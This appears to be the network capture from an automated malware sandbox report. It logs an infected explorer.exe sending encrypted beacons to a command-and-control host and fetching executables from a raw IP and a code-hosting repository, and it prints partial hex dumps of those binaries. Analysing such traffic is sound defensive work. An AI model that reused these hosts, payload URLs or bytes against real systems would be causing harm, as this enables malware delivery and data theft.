                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 330
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:20:41.512487888 CEST330OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 4b b7 b8
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuFKH#NhLqaCu/1N^#D]d9/7c["DUy"X3lxXk{Bv?BD(`f%M6eN+
                                                                                                                                            Oct 4, 2024 19:20:42.964591026 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:20:42 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            38192.168.2.450042180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:20:56.199033976 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://syllqtgnchytfjbx.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 172
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:20:56.199057102 CEST172OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 41 d2 85
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu;AdJEDy-QK9>ubT3;0u9"1 WAGH\'
                                                                                                                                            Oct 4, 2024 19:20:57.598699093 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:20:57 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.44979223.145.40.1644432580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 17:18:04 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: 23.145.40.164
                                                                                                                                            2024-10-04 17:18:04 UTC327INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:04 GMT
                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Last-Modified: Fri, 04 Oct 2024 17:00:02 GMT
                                                                                                                                            ETag: "38a00-623a99a265b8d"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 231936
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            2024-10-04 17:18:04 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 61 8d d7 7c 00 e3 84 7c 00 e3 84 7c 00 e3 84 c1 4f 75 84 7d 00 e3 84 62 52 67 84 66 00 e3 84 62 52 76 84 6c 00 e3 84 62 52 60 84 27 00 e3 84 5b c6 98 84 7b 00 e3 84 7c 00 e2 84 0a 00 e3 84 62 52 69 84 7d 00 e3 84 62 52 77 84 7d 00 e3 84 62 52 72 84 7d 00 e3 84 52 69 63 68 7c 00 e3 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 09 d6 64 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8a|||Ou}bRgfbRvlbR`'[{|bRi}bRw}bRr}Rich|PELd
                                                                                                                                            2024-10-04 17:18:04 UTC8000INData Raw: b9 94 ce 41 00 68 a4 87 41 00 2b c8 51 50 e8 fc 24 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 90 0d 00 00 83 c4 14 eb 02 33 f6 68 a0 87 41 00 53 57 e8 62 24 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 6c 0d 00 00 83 c4 14 8b 45 fc ff 34 c5 ac b2 41 00 53 57 e8 3d 24 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 47 0d 00 00 83 c4 14 68 10 20 01 00 68 78 87 41 00 57 e8 b0 22 00 00 83 c4 0c eb 32 6a f4 ff 15 ac 80 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac b2 41 00 ff 36 e8 19 25 00 00 59 50 ff 36 53 ff 15 f8 80 41 00 5f 5e 5b c9 c3 6a 03 e8 f5 25 00 00 59 83 f8 01 74 15 6a 03 e8 e8 25 00 00 59 85 c0 75 1f 83 3d 04 b0 41 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 8b ff 55 8b ec 8b 45 08
                                                                                                                                            Data Ascii: AhA+QP$t3VVVVV3hASWb$tVVVVVlE4ASW=$tVVVVVGh hxAW"2jA;t$tjEP4A6%YP6SA_^[j%Ytj%Yu=Auh)hYYUE
                                                                                                                                            2024-10-04 17:18:04 UTC8000INData Raw: 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 a4 4a 40 00 90 23 d1 8a 06 88 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 a4 4a 40 00 8d 49 00 9b 4a 40 00 88 4a 40 00 80 4a 40 00 78 4a 40 00 70 4a 40 00 68 4a 40 00 60 4a 40 00 58 4a 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 a4 4a 40 00 8b ff b4 4a 40 00 bc 4a 40 00 c8 4a 40 00 dc 4a 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc
                                                                                                                                            Data Ascii: FGr$J@#r$J@IJ@J@J@xJ@pJ@hJ@`J@XJ@DDDDDDDDDDDDDD$J@J@J@J@J@E^_E^_FGE^_IFGFGE^_t1
                                                                                                                                            2024-10-04 17:18:04 UTC8000INData Raw: 07 8b 40 04 89 45 18 ff 75 1c e8 b4 04 00 00 59 83 f8 ff 75 04 33 c0 eb 47 3b 45 18 74 1e 53 53 8d 4d 10 51 ff 75 0c 50 ff 75 18 e8 dc 04 00 00 8b f0 83 c4 18 3b f3 74 dc 89 75 0c ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 75 1c ff 15 6c 81 41 00 8b f8 3b f3 74 07 56 e8 9f c8 ff ff 59 8b c7 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 57 a6 ff ff c9 c3 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 29 c2 ff ff ff 75 24 8d 4d f0 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 16 fe ff ff 83 c4 1c 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 81 01 00 00 ff 76 04 e8 2f c8 ff ff ff 76 08 e8 27 c8 ff ff ff 76 0c e8 1f c8 ff ff ff 76 10 e8 17 c8 ff ff ff 76 14 e8 0f c8 ff ff ff 76 18 e8 07 c8 ff ff ff 36 e8 00 c8 ff ff ff 76 20
                                                                                                                                            Data Ascii: @EuYu3G;EtSSMQuPu;tuuuuuulA;tVYe_^[M3WUuM)u$Mu uuuuu}tMapUVuv/v'vvvv6v
                                                                                                                                            2024-10-04 17:18:04 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii:
                                                                                                                                            2024-10-04 17:18:05 UTC8000INData Raw: da a7 13 8f ff 81 d4 49 dd be ff 45 d9 f2 4a 72 ea d2 58 f8 c4 40 52 9e 02 d6 88 49 3c 0a 28 8d fe 54 23 32 d0 9f 23 74 0e 47 29 29 c2 58 92 51 ae 08 da f7 5d 9a 31 b5 d0 1d 84 60 d4 05 70 89 f6 93 83 70 0b 54 1d 83 60 36 cf 9f 90 2e 73 60 97 84 a2 4c 1f 31 ca 29 5a 86 59 2b 38 54 da 27 5e 8d d3 78 c4 ee f5 a4 9b 14 2b 8a b2 b7 0e 79 71 73 27 c4 cc d5 b5 6a e5 0f 08 0a a9 ea ea e3 79 c5 b3 08 a3 5c 6b a8 c7 74 49 45 6b 66 e3 24 f4 44 fd 5a 43 ea c9 7f 69 db de 6e 0c 8c d4 a0 43 eb 3b ee d8 51 ef c1 09 f4 b4 99 97 20 b2 9b c9 29 8a 00 7b bd 11 7b 9b c7 6e d0 14 1c a7 58 2e 69 f2 bd 6f 81 4d 88 b8 2d 5a 61 b1 de 2b 04 67 08 87 14 dc d3 02 e6 52 35 4c e2 77 69 94 36 64 79 f8 71 6f 4b 5c 2c 63 ee 0e fc 00 20 fc 87 cd 19 ee a1 af 5c b8 87 57 25 67 53 b2 01 a7
                                                                                                                                            Data Ascii: IEJrX@RI<(T#2#tG))XQ]1`ppT`6.s`L1)ZY+8T'^x+yqs'jy\ktIEkf$DZCinC;Q ){{nX.ioM-Za+gR5Lwi6dyqoK\,c \W%gS
                                                                                                                                            2024-10-04 17:18:05 UTC8000INData Raw: 14 f6 f5 9e bb b3 2e 46 e8 1f b8 71 7f 9f 0d fa a3 58 20 98 39 60 88 0a 13 ec c0 e4 60 49 b0 03 e7 42 c7 fc 59 b9 2d ee 65 2d c9 09 36 1a a4 19 ac 14 2c 11 e4 2a 40 c1 e0 34 15 bc d8 e7 e7 c5 6e 25 46 39 f9 fe f8 62 a0 f7 1c 9f 88 b4 b6 7a 80 fc 64 12 c0 d6 64 84 09 8e 39 eb 9f 64 6a 7f 9b 39 e6 3a 95 9d 98 ec 77 ec d1 1c 95 3f c4 ee a3 df b1 b6 81 66 1e ab 07 55 57 88 83 c9 85 78 39 b3 76 fb 2e c4 27 7c 2f 71 48 de fc 77 35 5d eb 9c 27 9d 26 38 ab 4a ba f5 53 fb ea d3 ab 5d c9 6f 6e 8d 08 84 fa c5 0c b2 02 3b 43 7e 83 46 b9 9b f9 ce 2e d5 94 5a a7 3a 06 88 2c 7f 6b 62 3b 38 98 8e 71 12 1d cf ce cd 5a f0 1c ca 11 30 11 14 ed 69 dd 27 0a 64 0d e2 84 eb b8 6d ac 2a d7 47 b1 5a 14 2c bb 7f 30 10 c9 2d ec 99 34 74 ca 70 39 26 30 6d 24 a7 d3 31 de ec e5 5c 8f
                                                                                                                                            Data Ascii: .FqX 9``IBY-e-6,*@4n%F9bzdd9dj9:w?fUWx9v.'|/qHw5]'&8JS]on;C~F.Z:,kb;8qZ0i'dm*GZ,0-4tp9&0m$1\
                                                                                                                                            2024-10-04 17:18:05 UTC8000INData Raw: 3a f7 2a b1 7e a0 26 bd 89 6f 30 ea 6e 28 d5 34 84 83 51 5b 1d b0 f5 9f 33 c8 a2 1d e7 56 42 24 f9 07 f6 76 c8 17 be 47 fb fb e9 d8 13 28 fc 35 eb 5f 09 c8 28 01 f7 21 d9 79 6c c4 b8 ac 87 b2 3e 59 a7 58 0b 34 39 8a bc de 9b 57 0d aa ce 7b 79 69 97 cc e1 c6 d8 ea 27 ab 72 84 ba 85 be f1 74 d0 e3 c3 c6 00 1a c4 d6 6a dd a8 f1 3c 91 35 f6 48 dd 7c b2 67 97 01 e0 96 e5 66 ed 15 66 2c 83 63 23 92 a2 26 a4 95 25 23 b3 2f cb d0 f7 ef d9 d9 5f d8 53 ea 79 43 b7 5e cc f6 98 36 86 d5 cf af b6 99 e9 a5 7e 13 61 44 c6 08 ef 21 e8 ac 31 df 72 b9 2b ba 1a 88 66 a5 fc bf b6 79 c1 6a ca 13 56 eb 1e ff fd 2e c5 08 32 4e d7 2a 99 d9 a7 ad da 6c 8e 52 9f 86 fe f8 2b 52 15 38 b5 b7 26 0b c5 5b de 4e 85 8b 39 80 8e a6 ff cb ac 1c 17 8a 81 74 b2 32 7c 7f bc 5f 9c 4f a2 fd 62
                                                                                                                                            Data Ascii: :*~&o0n(4Q[3VB$vG(5_(!yl>YX49W{yi'rtj<5H|gff,c#&%#/_SyC^6~aD!1r+fyjV.2N*lR+R8&[N9t2|_Ob
                                                                                                                                            2024-10-04 17:18:05 UTC8000INData Raw: 8f 42 3b 2f 83 7e 0f 21 00 7d 82 10 0d 51 bf 31 00 97 8f cc ed 1f 67 97 43 5b dd 83 d4 10 f7 f3 d9 a2 ae 85 43 03 43 1e 4b bd 53 33 26 6d fc 3d b9 79 68 53 b5 71 49 0d 15 c9 f9 b5 84 8a f5 53 ee 9a cc 1c 21 bf 3a 4a 36 33 09 18 41 af f0 99 53 42 1c 62 8b 51 cc 19 2d b3 6e b5 fb 7f 75 d7 86 0c c3 08 5c 62 bd 12 3f e3 bd c2 42 47 cb ae c9 53 a5 ff f3 b9 d2 a6 26 6e a6 2f 3c 06 2d 7b a1 d3 9e 24 9d 0a b4 51 a2 e9 4f 9f c7 9b 9d 95 dc 22 43 72 9a 88 8e 63 4b d7 24 ab c6 03 7c 99 40 5d a2 21 53 a5 8f 8c eb a8 e6 63 e7 9b ff 74 8d 73 e8 eb c3 82 47 d6 66 dc 70 17 81 14 28 4b c8 9d 27 c5 2e 0f 03 9e 87 4d 71 84 01 aa 6f 98 e7 ce 57 76 04 0b e0 61 19 6e 81 80 d8 04 ef eb 48 e5 4e b7 bf f1 40 31 3f be 87 68 f8 ed f7 48 20 23 d8 38 b5 ed 7e a2 bd e2 1e 37 27 aa 91
                                                                                                                                            Data Ascii: B;/~!}Q1gC[CCKS3&m=yhSqIS!:J63ASBbQ-nu\b?BGS&n/<-{$QO"CrcK$|@]!SctsGfp(K'.MqoWvanHN@1?hH #8~7'
                                                                                                                                            2024-10-04 17:18:05 UTC8000INData Raw: 69 4d 0f 4a 44 a8 c3 0b 99 81 89 bd 9a d6 d9 59 87 a9 e1 d6 8d e5 d5 71 69 bc fe 0c 5b 07 54 47 47 38 91 95 36 3a 39 a2 87 a4 59 98 37 10 85 4e 42 43 bf cc 45 d8 35 60 93 2e 1c fc fa d4 70 bd aa be 0c 92 02 85 a6 50 3a 8b fa 10 2f d4 37 de 2c e5 53 6d b0 69 04 18 38 d3 f4 f0 cf 38 60 68 54 6b bc fe 7d 74 70 f5 6d c6 a4 dc a6 30 13 d2 87 bd a9 6e 04 e6 57 19 19 f2 63 90 a2 19 8a 1e 10 18 25 d8 22 05 90 2e b0 8b a8 2c 8c ac 7f 85 73 37 f4 9d 1c 96 87 c8 eb 22 29 da 82 17 6c c7 cf 49 a4 63 89 33 17 28 2e bd 88 89 7b 5b 6d 2d 0a 70 4a 2a 1b 83 ee 9e 2b a7 2f ef 96 f8 4f 7e 37 01 85 34 0e d5 8f f5 fd 74 f0 bb 98 ea 7e aa 00 23 c3 32 2f db 3c 77 fb f1 f8 72 6e b0 f2 63 e8 60 f9 3b cd dd 31 24 02 2e 29 7f ab 3b 47 a7 4f 66 ad 20 20 e4 55 b6 7f 50 35 a1 fd 9e 75
                                                                                                                                            Data Ascii: iMJDYqi[TGG86:9Y7NBCE5`.pP:/7,Smi88`hTk}tpm0nWc%".,s7")lIc3(.{[m-pJ*+/O~74t~#2/<wrnc`;1$.);GOf UP5u


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449843217.197.91.1454432580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 17:18:15 UTC196OUTGET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: codeberg.org
                                                                                                                                            2024-10-04 17:18:16 UTC835INHTTP/1.1 200 OK
                                                                                                                                            access-control-expose-headers: Content-Disposition
                                                                                                                                            cache-control: private, max-age=300
                                                                                                                                            content-disposition: inline; filename="setup.exe"; filename*=UTF-8''setup.exe
                                                                                                                                            content-length: 2021096
                                                                                                                                            content-type: application/octet-stream
                                                                                                                                            etag: "931cc5cd86421960273f35c5125906288942171e"
                                                                                                                                            last-modified: Fri, 04 Oct 2024 15:31:47 GMT
                                                                                                                                            set-cookie: i_like_gitea=91f6071af1f11d8e; Path=/; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax
                                                                                                                                            set-cookie: _csrf=QgGqIzvG7ehUGvy_F7zD1ZIiLwI6MTcyODA2MjI5NTc1MTc0MDAzNg; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax
                                                                                                                                            date: Fri, 04 Oct 2024 17:18:16 GMT
                                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                                            permissions-policy: interest-cohort=()
                                                                                                                                            x-frame-options: sameorigin
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            connection: close
                                                                                                                                            2024-10-04 17:18:16 UTC14566INData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 b1 7d ab 4f 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 f2 01 00 00 c6 00 00 00 00 00 00 90 f9 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 03 00 00 04 00 00 5d 56 0e 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 53 02 00 c8 00 00 00 00 d0 02 00 60 40 00
                                                                                                                                            Data Ascii: MZ`@`!L!Require Windows$PEd}O#@ ]VS`@
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: d8 00 00 00 48 8d 54 24 20 48 8d 4c 24 50 41 b8 e9 fd 00 00 e8 75 ed ff ff 48 8b d8 48 8d 44 24 70 48 3b d8 74 3f 48 8b 4c 24 70 44 89 64 24 78 66 44 89 21 8b 53 08 48 8d 4c 24 70 e8 69 cc ff ff 4c 8b 1b 48 8b 4c 24 70 41 0f b7 03 49 83 c3 02 66 89 01 48 83 c1 02 66 41 3b c4 75 eb 8b 43 08 89 44 24 78 48 8b 4c 24 50 e8 85 b0 01 00 48 8d 4c 24 70 e8 45 f2 ff ff 48 8b 6c 24 60 48 8d 15 45 d5 01 00 48 8b cd ff 15 c4 cc 01 00 48 8b 74 24 70 41 3b c4 75 15 66 ba 3d 00 48 8b ce e8 da 07 01 00 41 3b c4 0f 8e 35 01 00 00 4c 39 25 76 2a 02 00 48 8d 1d 6f 2a 02 00 74 79 48 8b 0b ff 15 4c cc 01 00 48 8b 13 48 8b cd 4c 63 c0 ff 15 55 d0 01 00 41 3b c4 74 09 48 83 c3 08 4c 39 23 75 da 4c 39 23 74 4e b9 20 00 00 00 e8 08 b0 01 00 49 3b c4 74 1c 48 8d 54 24 60 48 8b c8
                                                                                                                                            Data Ascii: HT$ HL$PAuHHD$pH;t?HL$pDd$xfD!SHL$piLHL$pAIfHfA;uCD$xHL$PHL$pEHl$`HEHHt$pA;uf=HA;5L9%v*Ho*tyHLHHLcUA;tHL9#uL9#tN I;tHT$`H
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 04 77 08 41 b7 01 e9 83 fd ff ff 48 8d 94 24 a8 00 00 00 49 8d 4e 02 e8 5e da ff ff 48 3b c7 74 31 48 83 f8 01 74 08 4c 8b f0 e9 5f fd ff ff 48 8b 4c 24 60 e8 fb 70 01 00 48 3b df 74 09 48 8b 03 48 8b cb ff 50 10 8b fd e9 df 11 00 00 49 83 c6 04 48 8d 8c 24 a8 00 00 00 e8 a3 e1 ff ff 44 3a e7 0f 85 0c 02 00 00 f6 05 2f f7 01 00 04 0f 84 ff 01 00 00 e8 30 a5 ff ff 3b c7 0f 85 f2 01 00 00 be 03 00 00 00 48 8d 4c 24 40 48 89 7c 24 40 8b d6 89 7c 24 48 89 7c 24 4c e8 4a 8c ff ff 48 8d 8c 24 90 00 00 00 8b d6 48 89 bc 24 90 00 00 00 89 bc 24 98 00 00 00 89 bc 24 9c 00 00 00 e8 25 8c ff ff ff 15 17 8c 01 00 48 8d 54 24 40 48 8b c8 e8 9a e0 ff ff 48 8d 8c 24 80 00 00 00 48 8b d0 e8 9a a7 ff ff 4c 8d 44 24 40 48 8d 8c 24 30 01 00 00 66 ba 22 00 e8 88 dc ff ff 4c
                                                                                                                                            Data Ascii: wAH$IN^H;t1HtL_HL$`pH;tHHPIH$D:/0;HL$@H|$@|$H|$LJH$H$$$%HT$@HH$HLD$@H$0f"L
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: b8 01 00 48 89 0d a0 b8 01 00 e8 0f db ff ff 48 8b 4e 08 8b d3 ff 15 4f 50 01 00 41 b9 00 00 30 75 45 33 c0 48 8b c8 ba 01 04 00 00 ff 15 00 51 01 00 4c 8b 05 61 b7 01 00 4d 85 c0 74 36 8d 53 fc 48 8b ce e8 65 e0 ff ff 48 8b 4e 08 48 8b 3d 46 b7 01 00 8d 53 fc ff 15 0d 50 01 00 48 8b d7 48 8b c8 48 8b d8 ff 15 16 50 01 00 48 8b cb e8 82 93 ff ff f6 05 27 b1 01 00 04 74 5a 44 8b c5 ba b5 04 00 00 48 8b ce e8 91 da ff ff 48 8b 4e 08 ba b5 04 00 00 ff 15 ce 4f 01 00 bf f0 ff ff ff 48 8b c8 8b d7 ff 15 ae 4f 01 00 48 8b 4e 08 ba b5 04 00 00 48 8b d8 48 0b dd ff 15 a9 4f 01 00 4c 8b c3 48 8b c8 8b d7 ff 15 73 50 01 00 48 8b ce e8 8f e4 ff ff 39 2d fd b6 01 00 75 32 45 33 c0 ba b4 04 00 00 48 8b ce e8 2f da ff ff 48 8b 4e 08 33 d2 ff 15 a7 4e 01 00 48 85 c0 74
                                                                                                                                            Data Ascii: HHNOPA0uE3HQLaMt6SHeHNH=FSPHHHPH'tZDHHNOHOHNHHOLHsPH9-u2E3H/HN3NHt
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 00 41 8b cb bb 01 00 00 00 41 d3 e2 48 8b d3 41 8b ca 48 2b c8 49 8d bc 4d 5e 05 00 00 90 66 66 66 90 66 66 66 90 66 66 66 90 48 03 d2 41 81 f9 00 00 00 01 0f b7 0c 3a 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01 41 8b c1 c1 e8 0b 0f af c1 44 3b c0 73 16 44 8b c8 b8 00 08 00 00 2b c1 c1 e8 05 66 03 c1 66 89 04 3a eb 1a 44 2b c8 44 2b c0 8b c1 c1 e8 05 48 83 c2 01 66 2b c8 44 0b d3 66 89 4c 3a ff 03 db 41 83 eb 01 75 97 e9 16 02 00 00 41 83 eb 04 41 81 f9 00 00 00 01 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01 41 d1 e9 45 2b c1 41 8b c0 c1 e8 1f f7 d8 46 8d 54 50 01 41 23 c1 44 03 c0 41 83 eb 01 75 c5 41 0f b7 8d 46 06 00 00 41 c1 e2 04 41 81 f9 00 00 00 01 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01
                                                                                                                                            Data Ascii: AAHAH+IM^fffffffffHA:sEAADHAD;sD+ff:D+D+Hf+DfL:AuAAsEAADHAE+AFTPA#DAuAFAAsEAADH
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 03 48 8b 01 ff 50 08 33 c0 48 83 c4 20 5b c3 b8 02 40 00 80 48 83 c4 20 5b c3 40 53 48 83 ec 20 41 83 f8 05 48 8b d9 73 0b b8 57 00 07 80 48 83 c4 20 5b c3 0f b6 02 48 89 7c 24 30 3c 02 88 81 70 4b 00 00 8b 7a 01 72 61 3c 40 77 5d 8d 87 00 f8 ff ff 3d db f7 ff ff 77 50 48 83 c1 40 ba 00 00 10 00 e8 f2 e3 ff ff 84 c0 75 10 b8 0e 00 07 80 48 8b 7c 24 30 48 83 c4 20 5b c3 48 8d 8b 80 00 00 00 4c 8d 05 08 36 01 00 8b d7 e8 09 e6 ff ff 48 8b 7c 24 30 33 c9 85 c0 ba 0e 00 07 80 0f 44 ca 8b c1 48 83 c4 20 5b c3 b8 01 40 00 80 48 8b 7c 24 30 48 83 c4 20 5b c3 48 89 5c 24 18 48 89 6c 24 20 56 57 41 54 48 83 ec 20 48 8b f9 8b 89 7c 4b 00 00 33 f6 85 c9 45 8b e0 48 8b ea 74 17 83 e9 02 0f 84 60 01 00 00 83 f9 01 0f 85 b0 00 00 00 e9 60 01 00 00 48 8b 47 60 48 89 77
                                                                                                                                            Data Ascii: HP3H [@H [@SH AHsWH [H|$0<pKzra<@w]=wPH@uH|$0H [HL6H|$03DH [@H|$0H [H\$Hl$ VWATH H|K3EHt``HG`Hw
